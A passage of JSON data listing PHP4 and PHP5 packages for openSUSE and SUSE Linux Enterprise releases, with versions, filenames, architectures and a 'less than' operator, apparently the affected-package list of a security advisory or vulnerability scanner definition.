"lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-session", "packageFilename": "php4-session-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-pear", "packageFilename": "php4-pear-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-imap", "packageFilename": "php5-imap-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-imap", "packageFilename": "php5-imap-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-sysvmsg", "packageFilename": "php5-sysvmsg-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-devel", "packageFilename": "php4-devel-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-wddx", "packageFilename": "php4-wddx-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-imap", "packageFilename": "php4-imap-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "mod_php4-servlet", "packageFilename": "mod_php4-servlet-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-sysvshm", "packageFilename": "php5-sysvshm-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-fastcgi", "packageFilename": "php4-fastcgi-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-unixODBC", "packageFilename": "php4-unixODBC-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-servlet", "packageFilename": "php4-servlet-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-curl", "packageFilename": "php5-curl-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5", "packageFilename": "php5-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-fastcgi", "packageFilename": "php4-fastcgi-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-curl", "packageFilename": "php4-curl-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-32bit", "packageFilename": "php4-32bit-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-dom", "packageFilename": "php5-dom-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-mbstring", "packageFilename": "php4-mbstring-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-unixODBC", "packageFilename": "php4-unixODBC-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-servlet", "packageFilename": "php4-servlet-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-curl", "packageFilename": "php4-curl-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4", "packageFilename": "php4-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-pear", "packageFilename": "php5-pear-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-mbstring", "packageFilename": "php4-mbstring-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5", "packageFilename": "php5-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": 